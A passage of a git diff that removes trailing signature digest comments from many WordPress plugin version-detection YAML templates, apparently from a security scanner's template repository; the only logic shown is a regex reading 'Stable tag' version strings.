4b0a00483046022100f6c5f97993c8eb370c12fbea81e9a00d900dbea6fddb07fac3e0e2a08e20e666022100c8bc0a22f437c2159693080ac5cfcb56320284b4db599da8bc484855d8bb9651:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 09c41765f9..81f58198d3 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022069604dcf2ae28954369e7bd54284cf0b49bed76bd849d30d56ec96fcd2448f1002203a1e675925120cc61755ef69e0c802a5b2f2384de086eb9c2b357905094c36e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 40bbfa3b12..6ff90e0902 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201599ea8d8c90c330ca17825a536e54f3e4a0169da2ae2692179e0a35ffd6eac102210097c679c3a1895da0a426af5a25f84f98c6a77dd7d5306d776f8f64b668e49357:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 2fdf7c8f5d..a4c6980041 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022064d00d4b054df1f46ffa41623233c5d7a1367f0bae3e17a45a6530aecc87ba5002206fd2d00b661a129cc26f7ae97b327cdf49189539d961d0b248f77842e8d8ddab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 1dbb860dfa..e085f30e5a 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022005176b3dc6a9cf06f664b4f0c93b3fddd7b7ed04908b3f7a4c06a70e41c95f8c022100d568d140b05b9ea6609cb4cb86502bffa0ca4500784a02e71a07f2a49cc200b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index a6f0f21814..27e45e39ca 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009f89e2fe9db31ed10326a28e9a6081de663bc01fefef961c4bcbc5adf002df9402203f7d9429f4cde622ca1d7b1182efc3b51d5801b41fa8f1d5d4bbc25a9d7cd6da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 2c2a21d216..eb6e1aaa5d 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204412c841653647144b58be8ba2a20f6cc77d5839672b22484654bcf306ce8172022100fb3ea1c77c09d429a479c29099ac8068052a74993749fb5b270e62794f773f3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 8e00868bf5..d679d8df61 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022066cb2e4e9983af22b85f943380c05aa036d92841985fef5d6761a93016103c63022100af17885de626414de838912165f8c814490fced8e9c69b7fea2c1c9395110c5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index be0b7c1e58..8bfe16ca84 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210085842a196bae35b208e77c81a44de8345a0d6237f62a23eac81512600ff525d3022100c65342fcf385a5e4edecf023ba72715c9478fa5344cd631ae40a18eb61806b0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 87c34b60fa..a81fc892ca 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ba1532ca1a2cf334d62a7200c620d83a9d036281bd63a59b5e66fb03a670bea902202f597a786cef3355b551734aac201cb449f6b7f9537f543d2fd63fe1e027783f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 191bc244f0..d9c6052cd7 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022074a4a332f6b50c648058407cbcaa734ead6ab5d56f315171028ca3a86d8b98d7022100b6ae37f443b7010733d8a85bd8074a635c16a84ca7fade251f7bb577d38f22f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 093bf84fe9..afc1141e0c 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206b9516fd2c90cca1604c7969edece7a8adc7d28c3bbfae3442fce6509630e671022100e49d0f12a17ae262f9b70b117f0cf1267373cd2b5ab30662254d6a61ccedec1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 34ef2e7386..d44add9ca6 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210096637f7da8dd1390586889905df9097e6b4486b360f02c4fcc8263ed94f3a7d502207c7da5b993fabac11134d2be99c88b91ad7fe68f176809e8791bc90ff581a425:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 6f4ec6be4e..67968fb008 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ec585c3dd29738a9ea91b5e30825b67290faac62af343dbbb986d0fa8d8961cf02207f802ebb8ee24e73253293fcd604d9889058474f24607a9f2e9cb9b80628a51c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index c0fe939dff..cbcf3cf09d 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206bfb1e5af3d19dc86290db0ae306e451fb81030a8bd4caef19547a2d108aa9ca022100d554d2d67c3d905d2bd9f2775b4d343dd366c823445692ff898419cd53e610e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index fa62e70031..3311d42c94 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205f226bb10b7b8c656e36bbb1ca4cedeb0b9ad322eafcd192dc6b3a081044d97f022079d1f2ae385ce401bbd9d5b2a55f8952c145f2e2414c220468f6569145a35023:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 45987b21f6..46c1c22805 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bfd2787d98bd8b4508bf776d70f2295f637789de94834f2d79a37aa3d0e99074022100c8bb528a5b8be1fc2489c02fd229111b6e3568f6bf9937398665720c22e1f7a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index e231d0060d..7c13b8d2a4 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220266f767156e57bd0901402080068621a19620a1d0e8ae80850f9ebf9dea9f74302205714037637414c1d8d5a4a52bda02ecbc518ea5178c1ae35a05b46a1b8d790b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 346e2b843f..2d4f463d97 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205152ff3ab8ff7eae0aa884afa3638d8ecfbf5c23bbbef1448e91518f75d5a7e3022033b782542009cc8cd10e8a2ee2ed54ceb9343f05f42e59079b4ae11c1c4feebc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 2f2f5ef98f..cb67671918 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022025d87dbfdf4d1d0f8f5f72967a7bce612f254fb7a9cfd499d801fc48b8906a32022100f418c2a9c8ba58ead2ec02ba448ddfeeb88854a14ceac128fbbe2ba86d806adf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 222d49176d..cc3eb2481a 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202892ba4c67c0f74cd8376f4b4bf4821b2f18803ab045dc726baf4a089ffb5883022100fda87d8f02cf4c8f2d9fbac0112f1e75669b7e4396ad0b01889f135c52237a07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 5b0058a300..17584cd064 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008211f48fc6849f45232e3741b1a0183932ddafbe0daf15bb99fe33f441943325022100a82a77b01d8e6ce6b47c1e196b87657e1d8ffe80dffd58a2d3cf493996a7aa56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index e7df6a1169..015fb97043 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022066148125142164a1cf8719c3e4508fbc69ee18e00bd9b9a0a109df92a8bfa472022100c4ba5594ddd9cf6b75b672e7bafae6bc11518c9b32dce4cd01d001133531c396:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 882f45de14..1d5224b457 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220115da608ff4c16fbf0f7085b863088ecdd1cd51ccb6174918f519bbb31bf2712022100ba4305b755c0ca215565335e2ff3267cca2238c9a0b4ff1ca96fbdb09eb4850d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index c55df8a16a..aafd6c6a38 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220294157a7003cf59591bc88ee2223e29abef363631e709a68b37e9aa1b050de29022100cd7b5e304e1216a19704a43b0be3e53791101797ce88f53a03c103e978d10712:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index c81f0de44d..e10ab985da 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201be6cba042323dd834ae6b475f1925ccc6f2958a942c661f9147c1c2013f765e02203df60ad0023974d0851e893e754b607a4e2a9b2e5274f860b05234f5af420e16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index eaf697bda0..9881b591ae 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ef604856d4869df6c5d802e7597e7a5e7233525af89354cb262e19bbed469c8702205502f5df35eee809a905d9bdad8233b9cd3c24bcdd366dbe7fbe9bf2796386c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 9c562106e3..69c367b8d5 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f65c8f6e84218918e685fe599e366fab5c5470da6ec13cde50e8d3bbfb94605e02206ee131007de9da6dd1ad0b13057c99b9b272ab11e4f8c53dc140431440a704a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 2645fe3bb6..26d525386b 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220023e0a6d2a87f31e55d1859c6bee3f5b19be08111cf26414ce0d0a4e060c59570220008444c713edd550c6876876dea296884c2e064f2607cc09ed9a350dbaacb8a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index b8091777a7..3920c5cf56 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207d69b798103bedf6eee20780cd2884322d361f4dea3a0e8b169d18b1ceb5829a022059806a650073157bd76dd08d82687f598e293db2d30b2d765b5b96b84103a41a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index 212edcc90a..f556786f5a 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f18478366d1d75dc337f291a29eb00dac02497ff082a7a8f5ab9df483c7100e5022100c8301485889826581e57c75efcb7a8001bf23ea9ab518c209daf0bd0dbe1552d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 83623e19fc..844e3d19a0 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022041f60004469d1032b3efccdd6f24ea8f33b4df7217fdb5ef287df1007c0adebd02201a40accd6a0701541f9c258e87028b7bb7f281b4b670ed8d2279888f8a79b922:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 82ff89eeff..eb0f02f602 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207ca2323e5112269724e0018c4bb9301435d86b6bc2915c05a6dadf0420a5178f022100c91bb60f095f4f40725392da193a0ffcc6002f03fe5891962da0892399c91445:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index cbe1bd9c32..755efd53fa 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022061938f7e423aac5afda6f5b813b45534dcc858f5df260b3494dc5f8f3643fea70221008363f75f82f9e5a1b6cc9165c901661dfecc945939d1ee9f8ed95914ca2107ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 3f2f3b9931..9d77ce9155 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a60fe8e659b8401a9a6cfdf042e23cd55936ad0d661a52dfdc41b427677e7c7c02207461a5ac4931ccbc763781bbfd8a37cdc001270b53ede586cfa743a29d740e51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 233faf4b87..0403bb4e72 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c62a2215388170593aae13343d7d63fc0dacd8932ddf4ce9e04ffbeeb1705f35022100bb33bed0ef87a9ad39dfdd6dc60a5cf751a02ea1d7e956813f6055df409dbea4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 87ab589469..b5f8b822c7 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022068bc9f0d70430d3c80a0c221901903b4d9b5c0ae03c0bc7c9ef39a80e583af7e022013c5bf3b53fd920c6f017483d62fceb39264ba48f514c15b7d4acff6dae7bc4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 4bd98afbd4..85aaf7ff16 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205611e2c637583565433ea8ac8f0eb80003cf758c44dbd449cde9c0c4070f0d95022100f25a37184b7a44f26c4bb880254307aad431cc0f54622caa0b383a8c114baa54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index c47ab8e71f..34d36d4349 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c0b244000d32b33644d0058e797e3b86534a861c8f35d78dc4780608c75918d30220067a1b5ca07d3747f95dc1c59ba76ef89522946c18569467844486e607afe4ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 90f0ad53ee..d4ac0d179e 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e9e4b3105d4b421b8421d20a48dcc18b977a2d92025fe157d2f45f9b275274f902210090260235519d7dacd016cb3e49b6fd389e182595cd0bf2b565e35599c72a3f58:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index d8778e3dda..39b176dcb8 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220411d00666ef7f301cf45fe43a8635263725f5100eb5fc8ab57a4c23fff445bef022100d986f15698ddd73a7691013176b596e2a387615335c4f56304e0aa0ef1ff9fb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 0c14796d45..6f95506748 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202e239188d08735cfec914cf526387195ee77bd0a43bea6a32a02ccbbaff24c9e022100e67e407605a6fb06eba663c7b91a7ed4ba7f8bc967016a98d0f36601bb2135de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 0011f13c1d..8995434fce 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b29bbae1a19fde9a5752dea86ce82c2b55acb6662d230b0d61f0ccab1f77e749022078f3d119aa320db4db880df66fa3aff9dc0b5c86a498ba7f8d47ac05cb1d4e49:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index db0e309a56..8175806cb8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220088aba7122f7911df167c18a7d3b65e8b541af4803d320b4275935f3d02ddea9022100cc03b88e93b697a02ef53c94cd63dec4858c7a9c87490814c0d187bb9ebb6b56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 733ef4be65..db82bc7f43 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cbfb1e2b46b9216734e708c68c0f3821413c7db191594871089db73925277cbd02203a374f4ae854b15bbef30918aac8b518916607dcec7f06eac3534c3b7a569d5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 11c551a383..03ddae57bc 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022055eec176b1bd3ffcf4b72f4e63888589a1d75c080d11e649b76d817eecc3a636022100a6c06f0347bd33e54ba5e2aade27cdaade46675fdd033f85f762711176c62b23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index cd15ea8d8d..d6449bb5bf 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022052bf0d9334b853aa1f9bf29be1337b1f3bdbc92bb16a122583d4531994a381c1022100b470c64e75877ed4aa9f788be9cf4c916d16d1669dd5bc718fec3eaf43b6b6d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 1854c1c96e..2d5fdf1779 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -47,4 +47,3 @@ http: part: body regex: - 